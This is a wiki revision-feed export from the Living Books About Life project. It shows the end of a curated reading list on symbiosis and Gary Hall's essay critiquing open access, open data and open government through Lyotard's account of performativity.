== Symbiosis and Evolution  ==&lt;br /&gt;
{{#widget:Vimeo|id=7461457}} &lt;br /&gt;
&lt;br /&gt;
; Watson, R. A. and Pollack, J. B. : [http://eprints.ecs.soton.ac.uk/12009/ How Symbiosis Can Guide Evolution] &lt;br /&gt;
; Fabio Luciani and Samuel Alizon : [http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000565 The Evolutionary Dynamics of a Rapidly Mutating Virus within and between Hosts: The Case of Hepatitis C Virus ] &lt;br /&gt;
; Wired Science : [http://www.wired.com/wiredscience/2010/01/green-sea-slug/ Green Sea Slug Is Part Animal, Part Plant] &lt;br /&gt;
&lt;br /&gt;
=== Endosymbiosis  ===&lt;br /&gt;
&lt;br /&gt;
[[Image:Endosymbiosis.PNG|249x270px|Endosymbiosis.PNG]] &lt;br /&gt;
&lt;br /&gt;
; Jian Xu, Michael A. Mahowald, Ruth E. Ley et al. : [http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0050156 Evolution of Symbiotic Bacteria in the Distal Human Intestine] &lt;br /&gt;
&lt;br /&gt;
; Jennifer J. Wernegreen : [http://www.plosbiology.org/article/info:doi/10.1371/journal.pbio.0020068 Endosymbiosis: Lessons in Conflict Resolution]&lt;br /&gt;
&lt;br /&gt;
=== Symbiogenetics ===&lt;br /&gt;
; Lynn Margulis : [http://books.google.com/books?id=3sKzeiHUIUQC&amp;amp;lpg=PP1&amp;amp;dq=inauthor%3A%22Lynn%20Margulis%22&amp;amp;pg=PA1#v=onepage&amp;amp;q&amp;amp;f=false Symbiogenesis and Symbionticism]&lt;br /&gt;
; Ivan Emmanuel Wallin : [http://www.archive.org/download/symbionticismori00wall/symbionticismori00wall.pdf Symbionticism and the origin of species (1927)]&lt;br /&gt;
&lt;br /&gt;
== Symbiosis and Ecology  ==&lt;br /&gt;
=== Community Ecology ===&lt;br /&gt;
; Jos C. Mieog, Jeanine L. Olsen, Ray Berkelmans et al. : [http://www.plosone.org/article/info:doi%2F10.1371%2Fjournal.pone.0006364 The Roles and Interactions of Symbiont, Host and Environment in Defining Coral Fitness] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;hbveXyfIllY&amp;lt;/youtube&amp;gt; &amp;lt;youtube&amp;gt;LBR4pEC7kwU&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Biodiversity and complexity  ===&lt;br /&gt;
; Christina Toft, Tom A. Williams, and Mario A. Fares : [http://www.ploscompbiol.org/article/info%3Adoi%2F10.1371%2Fjournal.pcbi.1000344 Genome-Wide Functional Divergence after the Symbiosis of Proteobacteria with Insects Unraveled through a Novel Computational Approach]&lt;br /&gt;
&lt;br /&gt;
=== Interdependence ===&lt;br /&gt;
; Timothy Morton – Thinking Ecology&amp;lt;nowiki&amp;gt;:&amp;lt;/nowiki&amp;gt; The Mesh Part 1: &amp;lt;youtube&amp;gt;R-mWCPa9y3c&amp;lt;/youtube&amp;gt;&lt;br /&gt;
; Timothy Morton – : [http://www.youtube.com/watch?v=viiA5s8DV7I Thinking Ecology: The Mesh Part 2]&lt;br /&gt;
; Timothy Morton –  : [http://www.youtube.com/watch?v=BNl6fOd26Q0 Thinking Ecology: The Mesh Part 3]&lt;br /&gt;
&lt;br /&gt;
=== Life Systems and Gaia Hypothesis ===&lt;br /&gt;
; Fritjof Capra : [http://www.mountainman.com.au/f_capra.html The Turning Point: Chapter on the Systems View of Life] &lt;br /&gt;
; Stephen B. Scharper : [http://books.google.co.uk/books?id=-h4UqAHe4MMC&amp;amp;lpg=PA53&amp;amp;ots=vVwmgq055Q&amp;amp;dq=james%20lovelock%20gaia%20symbiosis&amp;amp;lr&amp;amp;pg=PA53#v=onepage&amp;amp;q=james%20lovelock%20gaia%20symbiosis&amp;amp;f=false The Gaia Hypothesis. The world as a living organism]&lt;br /&gt;
; Timothy Morton : [http://itunes.apple.com/gb/itunes-u/literature-environment-fall/id399641376 Lynn Margulis, Symbiosis, Ethics] Track 30 of Literature and the Environment&lt;br /&gt;
; Lynn Margulis, Stephen Buhner and John Seed : Activism, Deep Ecology &amp;amp; the Gaian Era&lt;br /&gt;
&amp;lt;youtube&amp;gt;Zc99ikb3KXY&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Media Ecologies ===&lt;br /&gt;
; Matthew Fuller : [http://mitpress.mit.edu/books/chapters/026256226Xintro1.pdf Media Ecologies ] &lt;br /&gt;
&lt;br /&gt;
== Symbiosis and Posthumanism ==&lt;br /&gt;
=== Human/Machine Symbiosis ===&lt;br /&gt;
; J.C.R. Licklider : [http://memex.org/licklider.pdf Man-Computer symbiosis] &lt;br /&gt;
; Gerwin Schalk : [http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2722922/ Brain-Computer Symbiosis] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;oLalkcMDCwg&amp;lt;/youtube&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Symbiotic Intelligence===&lt;br /&gt;
; David E. Moriarty and Risto Miikkulainen : [http://nn.cs.utexas.edu/?moriarty:ec97 Forming Neural Networks Through Efficient and Adaptive Coevolution]&lt;br /&gt;
; Norman L. Johnson and S. Rasmussen : [http://collectivescience.com/deeper_overview.html Symbiotic Intelligence and the Internet: A Deeper Overview]&lt;br /&gt;
&lt;br /&gt;
===Human-animal hybrids, chimeras and symbiosis ===&lt;br /&gt;
; Anant Bhan, Peter A Singer, and Abdallah S Daar : [http://biomedcentral.com/content/pdf/1472-698X-10-8.PDF Human-animal chimeras for vaccine development: an endangered species or opportunity for the developing world?] &lt;br /&gt;
&lt;br /&gt;
=== Machinic assemblages: Bugs, machines and viruses ===&lt;br /&gt;
; Susan Schuppli : [http://www.cosmosandhistory.org/index.php/journal/article/download/103-222-1-PB.PDF Of Mice Moths and Men Machines] &lt;br /&gt;
; Jussi Parikka : [http://four.fibreculturejournal.org/fcj-019-digital-monsters-binary-aliens-%E2%80%93-computer-viruses-capitalism-and-the-flow-of-information/ Digital Monsters, Binary Aliens – Computer Viruses, Capitalism and the Flow of Information] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;XwpHhkXnWeA&amp;lt;/youtube&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== Symbiosis and Augmentation ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;youtube&amp;gt;VCYrW-G9Y6I&amp;lt;/youtube&amp;gt;&lt;br /&gt;
; Justin C. Sanchez, Babak Mahmoudi, Jack DiGiovanna, Jose C. Principe : [http://www.bme.miami.edu/nrg/publications/journal/journal%2019.pdf Exploiting co-adaptation for the design of symbiotic neuroprosthetic assistants]&lt;br /&gt;
; Mitchell Whitelaw : [http://www.hostprods.net/text/symbiotic-circuits/ Andy Gracie: Symbiotic Circuits] &lt;br /&gt;
; Melinda Rackham : [http://www.culturemachine.net/index.php/cm/article/view/291/276 Carrier becoming symborg]&lt;br /&gt;
; Melinda Rackham and Damien Everett : [http://collection.eliterature.org/1/works/rackham_everett__carrier_becoming_symborg.html Carrier (becoming symborg)]&lt;br /&gt;
; Christian Bök : [http://www.law.ed.ac.uk/ahrc/script-ed/vol5-2/editorial.asp The Xenotext Experiment]&lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Symbiosis/Attributions Attributions] ==&lt;br /&gt;
&lt;br /&gt;
== A 'Frozen' PDF Version of this Living Book ==&lt;br /&gt;
; [http://livingbooksaboutlife.org/pdfs/bookarchive/Symbiosis.pdf Download a 'frozen' PDF version of this book as it appeared on 7th October 2011]&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5508</id>
		<title>Open science/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Open_science/Introduction&amp;diff=5508"/>
		<updated>2013-11-19T09:15:41Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me Back to the book] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
= '''White Noise: On the Limits of Openness (Living Book Mix)'''  =&lt;br /&gt;
&lt;br /&gt;
= Gary Hall  =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;PH54cp2ggFk&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the explicit aims of the Living Books About Life series is to provide a point of interrogation and contestation, as well as connection and translation, between the humanities and the sciences (partly to avoid slipping into 'scientism'). Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from (in this case) ''computer science'' and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being used to produce new ways of approaching and understanding texts in the humanities; what is sometimes thought of as ‘the digital humanities’. The concern in the main has been with either digitizing ‘born analog’ humanities texts and artifacts (e.g. making annotated editions of the art and writing of [http://www.blakearchive.org/blake/ William Blake] available to scholars and researchers online), or gathering together ‘born digital’ humanities texts and artifacts (videos, websites, games, photography, sound recordings, 3D data), and then taking complex and often extremely large-scale data analysis techniques from computer science and related fields and applying them to these humanities texts and artifacts – to this ‘big data’, as it has been called. Witness Lev Manovich and the Software Studies Initiative’s use of ‘[http://www.manovich.net/DOCS/Manovich_trending_paper.pdf digital image analysis and new visualization techniques]’ to study ‘20,000 pages of Science and Popular Science magazines… published between 1872-1922, 780 paintings by van Gogh, 4535 covers of Time magazine (1923-2009) and one million manga pages’ (Manovich, 2011), and Dan Cohen and Fred Gibbs’s text mining of ‘[http://www.dancohen.org/2010/10/04/searching-for-the-victorians/?utm_source=feedburner&amp;amp;utm_medium=feed&amp;amp;utm_campaign=Feed%3A+DanCohen+%28Dan+Cohen%29&amp;amp;utm_content=Google+Reader the 1,681,161 books that were published in English in the UK in the long nineteenth century]’ (Cohen, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; What ''Digitize Me, Visualize Me, Search Me'' endeavours to show is that such data-focused transformations in research can be seen as part of a major alteration in the status and nature of knowledge. It is an alteration that, according to the philosopher Jean-François Lyotard, has been taking place since at least the 1950s, and involves nothing less than a shift away from a concern with questions of what is right and just, and toward a concern with legitimating power by optimizing the social system’s performance in instrumental, functional terms. This shift has significant consequences for our idea of knowledge. Indeed, for Lyotard: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The nature of knowledge cannot survive unchanged within this context of general transformation. It can fit into the new channels, and become operational, only if learning is translated into quantities of information. We can predict that anything in the constituted body of knowledge that is not translatable in this way will be abandoned and that the direction of new research will be dictated by the possibility of its eventual results being translatable into computer language. The ‘producers’ and users of knowledge must now, and will have to, possess the means of translating into these languages whatever they want to invent or learn. Research on translating machines is already well advanced. Along with the hegemony of computers comes a certain logic, and therefore a certain set of prescriptions determining which statements are accepted as ‘knowledge’ statements. (1986: 4)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In particular, ''Digitize Me, Visualize Me, Search Me'' suggests that the turn in the humanities toward data-driven scholarship, science visualization, statistical data analysis, etc. can be placed alongside all those discourses that are being put forward at the moment - in both the academy and society - in the name of greater openness, transparency, efficiency and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Access ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The open access movement provides a case in point. Witness [http://www.knowledge-exchange.info/Admin/Public/DWSDownload.aspx?File=%2fFiles%2fFiler%2fdownloads%2fOA_What_are_the_economic_benefits_-_a_comparison_of_UK-NL-DK__FINAL_logos.pdf John Houghton’s] 2009 comparison of the benefits of OA for the United Kingdom, Netherlands and Denmark, which claims to show that the open access academic publishing model, in which peer reviewed scholarly research and publications are made available for free online to all those who are able to access the Internet, is actually the most cost effective mechanism for scholarly publishing. Others meanwhile have detailed the increases open access publishing enables in the amount of material that can be published, searched and stored, in the number of people who can access it, in the impact of that material, the range of its distribution, and in the speed and ease of reporting and information retrieval. The following announcement, posted on the BOAI (Budapest Open Access Initiative) list in March 2010, is fairly typical in this respect: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Today PLoS released Pubget links across its journal sites. Now, when users are browsing thousands of reference citations on PLoS journals they will be able to get to the full text article faster than ever before. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Specifically, when readers encounter citations to articles as recorded by CrossRef (which are accessed via the ‘CrossRef’ link in the ‘Cited in’ section of any article’s Metrics tab), a PDF icon will also appear if it is freely available via Pubget. Clicking on the icon will take you directly to the PDF. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; On launching this new functionality, Pete Binfield, Publisher of PLoS ONE and the Community Journals said: ‘Any service, like Pubget, that makes it easier for authors to quickly find the information they need is a welcome addition to our articles. We like how Pubget helps to break down content walls in science, letting users get instantly to the article-level detail that they seek.’ (Pubget, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''Open Data ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet it is not just the research literature that is positioned as being rendered more accessible by scientists. Even the data created in the course of scientific research is promoted as being made freely and openly available for others to use, analyse and build upon. This includes data sets that are too large to be included in any resulting peer-reviewed publications. Known as open data, or data-sharing, this initiative is motivated by the idea that publishing data online on an open basis bestows it with a [http://eprints.ecs.soton.ac.uk/17424/1/Swan_-_NERC_09.pptx ‘vastly increased utility’]. Digital data sets are said to be ‘easily passed around’; they are seemingly ‘more easily reused’, reanalysed and checked for accuracy and validity; and they supposedly contain more ‘opportunities for educational and commercial exploitation’ (Swan, 2009). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, certain academic publishers are already viewing the linking of their journals to the underlying data as another of the ‘value-added’ services they can offer, to set alongside automatic alerting and sophisticated citation, indexing, searching and linking facilities (and to no doubt help ward off the threat of disintermediation posed by the development of digital technology, which enables academics to take over the means of dissemination and publish their work for and by themselves cheaply and easily). Significantly, a [http://www.jisc.ac.uk/publications/documents/opensciencerpt.aspx 2009 JISC report] also identified ‘open-ness, predictive science based on massive data volumes and citizen involvement as [all] being important features of tomorrow’s research practice’. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; In a further move in this direction, all Public Library of Science (PLoS) journals are now providing a broad range of article-level metrics and indicators relating to usage data on an open basis. No longer withheld as trade secrets, these metrics reveal which articles are attracting the most views, citations from the scholarly literature, social bookmarks, coverage in the media, comments, responses, ‘star’ ratings, blog coverage, and so on. PLoS has positioned this programme as enabling science scholars to assess [http://blogs.plos.org/plos/2009/09/article-level-metrics-at-plos-addition-of-usage-data/ ‘research articles on their own merits rather than on the basis of the journal (and its impact factor) where the work happens to be published’], and they encourage readers to carry out their own analyses of this open data (Patterson, 2009). Yet it is difficult not to perceive such article-level metrics and management tools as also being part of the wider process of transforming knowledge and learning into ‘quantities of information’ (Lyotard, 1986: 4); quantities, furthermore, that are produced more to be exchanged, marketed and sold (1986: 4) – for example, by individual academics to their departments, institutions, funders and governments in the form of indicators of ‘quality’ and ‘impact’ (1986: 5). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''From Open Science to Open Government ''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such developments around open access and open data are themselves part of the larger trend or phenomenon that is coming to be known as ‘open science’. As Murray et al. put it: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Open science is emerging as a collaborative and transparent approach to research. It is the idea that all data (both published and unpublished) should be freely available, and that private interests should not stymie its use by means of copyright, intellectual property rights and patents. It also embraces open access publishing and open source software… (Murray et al, 2008)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting and well known examples of how such open science may work is provided by the Open Notebook Science of the organic chemist Jean-Claude Bradley. ‘[I]n the interests of openness’, Bradley is making the [http://www.infotoday.com/IT/sep10/Poynder.shtml ‘details of every experiment done in his lab freely available on the web']. This ‘includes all the data generated from these experiments too, even the failed experiments’. What is more, he is doing so in ‘real time’, ‘within hours of production, not after the months or years involved in peer review’ (Poynder, 2010). Again, we can see how emphasis is being placed on the amount of research that can be shared, and the speed with which this can be achieved. This openness on Bradley’s part is also positioned as a means of achieving usefulness and impact, as is evident from the very title of one of his Open Notebook Science projects, [http://usefulchem.wikispaces.com/ UsefulChem]. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; To be fair, however, such discourses around openness, transparency, efficiency and utility are not confined to the sciences – or even the university, for that matter. There are also wider political initiatives, dubbed ‘Open Government’, or ‘Government 2.0’, with both the Labour and the Conservative/Liberal Democrat coalition administrations in the UK making a great display of freeing government information. The Labour government implemented the Freedom of Information (FOI) Act in 2000, and then proceeded to launch a [http://www.data.gov.uk website] expressly dedicated to the release of governmental data sets in January 2010. It is a website that the current Conservative/Liberal Democrat coalition government continues to make extensive use of. In a similar vein, the [http://www.freeourdata.org.uk/ Guardian] newspaper has campaigned for the UK government to relinquish its copyright on all local, regional and national data collected with taxpayers’ money and to make such data freely and openly available to the public by publishing it online, where it can be collectively and collaboratively scrutinized, searched, mined, mapped, graphed, cross-tabulated, visualized, audited and interpreted using software tools. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Nor is this phenomenon confined to the UK. In the United States Barack Obama promised throughout his election campaign to make government more open. He followed this up by issuing a memorandum on transparency the very first day after he became President, vowing to make openness one of [http://www.nytimes.com/2009/01/22/us/politics/22obama.html ‘the touchstones of this presidency’] (Obama, cited in Stolberg, 2009): ‘[http://www.whitehouse.gov/the_press_office/TransparencyandOpenGovernment/ My Administration] is committed to creating an unprecedented level of openness in Government. We will work together to ensure the public trust and establish a system of transparency, public participation, and collaboration. Openness will strengthen our democracy and promote efficiency and effectiveness in Government’ (The White House, 2009). 
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; '''The Politics of Openness''' &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The connection I am making here between the movements for open access, open data, open science and open government is one that has to a certain extent already been pointed to by Michael Gurstein in his reflections on the experience of attending the 2011 conference of the [http://okfn.org/ Open Knowledge Foundation]. For Gurstein: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ the ‘open data/open government’ movement] begins from a profoundly political perspective that government is largely ineffective and inefficient (and possibly corrupt) and that it hides that ineffectiveness and inefficiency (and possible corruption) from public scrutiny through lack of transparency in its operations and particularly in denying to the public access to information (data) about its operations. And further that this access once available would give citizens the means to hold bureaucrats (and their political masters) accountable for their actions. In doing so it would give these self-same citizens a platform on which to undertake (or at least collaborate with) these bureaucrats in certain key and significant activities—planning, analyzing, budgeting that sort of thing. Moreover through the implementation of processes of crowdsourcing this would also provide the bureaucrats with the overwhelming benefits of having access to and input from the knowledge and wisdom of the broader interested public. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Put in somewhat different terms but with essentially the same meaning—it’s the taxpayer’s money and they have the right to participate in overseeing how it is spent. Having “open” access to government’s data/information gives citizens the tools to exercise that right. (Gurstein, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, for Gurstein, we need a much clearer understanding of what exactly is meant by openness than many open data/open government advocates have displayed to date, and of where arguments in favour of open access, open information and open data are likely to lead us in the not too distant future. With this in mind, we could endeavour to put some flesh on the bones of Gurstein’s sketch of the politics of openness and suggest that, from a liberal perspective, freeing publicly funded and acquired information and data – whether it is gathered directly in the process of census collection, or indirectly as part of other activities (crime, healthcare, transport, schools and accident statistics) – is seen as helping society to perform more efficiently. For liberals, openness is said to play a key role in increasing citizen trust, participation and involvement in democracy, and indeed government, as access to information – such as that needed to intervene in public policy – is no longer restricted either to the state or to those corporations, institutions, organizations and individuals who have sufficient money and power to acquire it for themselves. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Such liberal beliefs find support in the idea that making information and data freely and transparently available accords with Article 19 of the Universal Declaration of Human Rights. The latter states that everyone has the right [http://www.un.org/en/documents/udhr/index.shtml ‘to seek, receive and impart information and ideas through any media and regardless of frontiers’]. Hillary Clinton, the United States Secretary of State, put forward a similar vision when, at the beginning of 2010, she said of her country that ‘[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full We stand for a single internet] where all of humanity has equal access to knowledge and ideas’, and came out against the authoritarian censorship and suppression of free speech and of online search facilities like Google in countries such as China and Iran. Clinton declared: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;[http://www.foreignpolicy.com/articles/2010/01/21/internet_freedom?page=full Even in authoritarian countries], information networks are helping people discover new facts and making governments more accountable. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; During his visit to China in November [2009], President Obama held a town hall meeting with an online component to highlight the importance of the internet. In response to a question that was sent in over the internet, he defended the right of people to freely access information, and said that the more freely information flows, the stronger societies become. He spoke about how access to information helps citizens to hold their governments accountable, generates new ideas, and encourages creativity. The United States' belief in that truth is what brings me here today. (Clinton, 2010)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This political sentiment was shared by Jeff Jarvis, author of ''What Would Google Do?'', when, in support of Google’s decision to stop self-filtering search results in China, he argued in March 2010 for a bill of rights for cyberspace: ‘[http://www.buzzmachine.com/2010/03/27/a-bill-of-rights-in-cyberspace/ to claim and secure our freedom] to connect, speak, assemble, and act online; to each control our identities and data; to speak our languages; to protect what is public and private; and to assure openness’ (Jarvis, 2010: 4). Yet are Clinton and Jarvis not both guilty here of overlooking (or should that be conveniently forgetting or even denying) the way liberal ideas of freedom and openness (and, indeed, of the human) have long been used in the service of colonialism and neoliberal globalisation? Does freedom for the latter not primarily mean economic freedom, i.e., freedom of the market, freedom of the consumer to choose what to consume – not only in terms of goods, but also lifestyles and ways of being? &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Even though it dates from before the widespread use of networked computers, it is interesting that ‘fifteen years after the Freedom of Information Act law was passed’ in the US in 1966, ‘the General Accounting Office reported that 82 percent of requests [for information] came from business, nine percent from the press, and only 1 percent from individuals or public interest groups’ (Fung et al., 2007: 27-28). Certainly, in the UK today, the ‘truth is that the [UK] FOI Act [2000] isn’t used, for the most part, by “the people”’, as Tony Blair acknowledged in his recent memoir. ‘It’s used by journalists’ (Blair, 2010) – and by businesses, one might add. In view of this, it is no surprise to find that neoliberals also support making government data freely and openly available to businesses and the public. They do so on the grounds that it provides a means of achieving the best possible ‘input/output ratio’ for society (Lyotard, 1986: 54). This way of thinking is of a piece with the emphasis placed by neoliberalism’s audit culture on accountability, transparency, evaluation, measurement and centralised data management: in the context of UK higher education, for example, it is evident in the stress placed on measuring the impact of research on society and the economy, teaching standards, contact hours, as well as student drop-out rates, future employment destinations and earning prospects. From this perspective, such openness and communicative transparency is perceived as ensuring greater value for (taxpayers’) money, supposedly helping to eliminate corruption, enabling costs to be distributed more effectively, and increasing choice, innovation, enterprise, creativity, competitiveness and accountability. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Meanwhile, some libertarians have gone so far as to argue that there is no need at all to make difficult policy decisions about what data and information it is right to publish online and what to keep secret. Instead, we should work toward the kind of situation the science-fiction writer Bruce Sterling proposes. 
In ''Shaping Things'', his non-fiction book on the future of design, Sterling advocates retaining all data and information, ‘the known, the unknown known, and the unknown unknown’, in large archives and databases equipped with the necessary bandwidth, processing speed and storage capacity, and simply devising search tools and metadata that are accurate, fast and powerful enough to find and access it (Sterling, 2005: 47). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Yet to have participated in the shift away from questions of truth, justice and especially what, in ''The Inhuman'', Lyotard places under the headings of ‘heterogeneity, dissensus, event…the unharmonizable’ (1991: 4), and ''toward'' a concern with performativity, measurement and optimising the relation between input and output, one does not need to be a practicing [http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data data journalist], or to have actively contributed to the movements for open access, open data, open science or open government. If you are one of the 1.3 million-plus people who have purchased a Kindle, and helped sales of digital books outpace those of hardbacks on Amazon’s US website, then you have already signed a license agreement allowing the online book retailer – but not academic researchers or the public – to collect, store, mine, analyse and extract economic value from data concerning your personal reading habits for free. Similarly, if you are one of the over 687 million people worldwide who use the Facebook social network, then you are already voluntarily giving your time and labour for free, not only to help its owners, their investors, and other companies make a reputed $1 billion a year from demographically targeted advertising, but to supply governments and law enforcement agencies such as the NSA in the US and GCHQ in the UK with profile data relating to yourself, your family, friends, colleagues and peers that they can [http://www.eff.org/deeplinks/2010/03/eff-posts-documents-detailing-law-enforcement use in investigations] (Hoffman, 2010). Even if you have done neither, you will in all probability have provided Google with a host of network data and digital traces it can both monetize and give to the police, as a result of its having mapped your home, digitized your book, or supplied you with free music videos to enjoy via Google Street View, Google Maps, Google Earth, Google Book Search and YouTube, which Google also owns. Lest this shift from open access to Google seem somewhat far-fetched, it is worth recalling that ‘[http://www.nea.org/assets/img/PubAlmanac/ALM_09_06.pdf Google has moved to establish, embellish, or replace many core university services] such as library databases, search interfaces, and e-mail servers’ (Vaidhyanathan, 2009: 65-66); and that academia in fact gave birth to Google, Google’s PageRank algorithm being little more [http://journalofjournalperformancestudies.org/journal/index.php/jjps/article/view/6/6 ‘than an expansion of what is known as citation analysis’] (Knouf, 2010). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;lt;youtube&amp;gt;R7yfV6RzE30&amp;lt;/youtube&amp;gt; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Obviously, no matter how exciting and enjoyable such activities may be, you don’t ''have'' to buy that e-book reader, join that social network or display your personal metrics online, from sexual activity to food consumption, in an attempt to identify patterns in your life – what is called life-tracking or self-tracking. 
(Although, actually, a lot of people are quite happy to keep contributing to the networked communities reached by Facebook and YouTube, even though they realise they are being used as free labour and that, in the case of the former, much of what they do cannot be accessed by search engines and web browsers. They just see this as being part of the deal and a reasonable trade-off for the services and experiences that are provided by these companies.) Nevertheless, refusing to take part in this transformation of knowledge and learning into quantities of data, and in the accompanying shift ''away'' from critical questions of what is just and right ''toward'' a concern with optimizing the system’s performance, is not an option for most of us. It is not something that can be opted out of by simply declining to take out a Tesco Club Card or use cash-points, refusing to look for research using Google Scholar, or committing social networking [http://www.suicidemachine.org/ ‘suicide’] and reading print-on-paper books instead. &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For one thing, the process of capturing data by means not just of the internet, but of a myriad of cameras, sensors and robotic devices, is now so ubiquitous and all-pervasive that it is impossible to avoid being caught up in it, no matter how rich, knowledgeable and technologically proficient you are. The latest research indicates there are approximately 1.85 million CCTV cameras in the UK – one for every 32 people. Yet no one really knows how many CCTV cameras are actually in operation in Britain today – and that’s without even mentioning other means of gathering data that are reputed to be more intrusive still, such as mobile phone GPS location and automatic number plate recognition (ANPR). &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; For another, and as the example of CCTV illustrates, it’s not necessarily a question of actively doing something in this respect: of positively contributing free labour to the likes of Flickr and YouTube, for instance, or of refusing to do so. Nor is it merely a case of the separation between work and non-work being harder to maintain nowadays. (Is it work, leisure or play when you are writing a status update on Facebook, posting a photograph, ‘friending’ someone, interacting, detailing your ‘likes’ and ‘dislikes’ regarding the places you eat, the films you watch, the books you read?) As Gilles Deleuze and Felix Guattari pointed out some time ago, ‘surplus labor no longer requires labor... one may furnish surplus-value without doing any work’, or anything that even remotely resembles work for that matter, at least as it is most commonly understood: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;In these new conditions, it remains true that all labour involves surplus labor; but surplus labor no longer requires labor. Surplus labor, capitalist organization in its entirety, operates less and less by the striation of space-time corresponding to the physicosocial concept of work. Rather, it is as though human alienation through surplus labor were replaced by a generalized ‘machinic enslavement’, such that one may furnish surplus-value without doing any work (children, the retired, the unemployed, television viewers, etc.). Not only does the user as such tend to become an employee, but capitalism operates less on a quantity of labor than by a complex qualitative process bringing into play modes of transportation, urban models, the media, the entertainment industries, ways of perceiving and feeling – every semiotic system. It is as though, at the outcome of the striation that capitalism was able to carry to an unequalled point of perfection, circulating capital necessarily recreated, reconstituted, a sort of smooth space in which the destiny of human beings is recast. (Deleuze and Guattari, 1988: 492)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
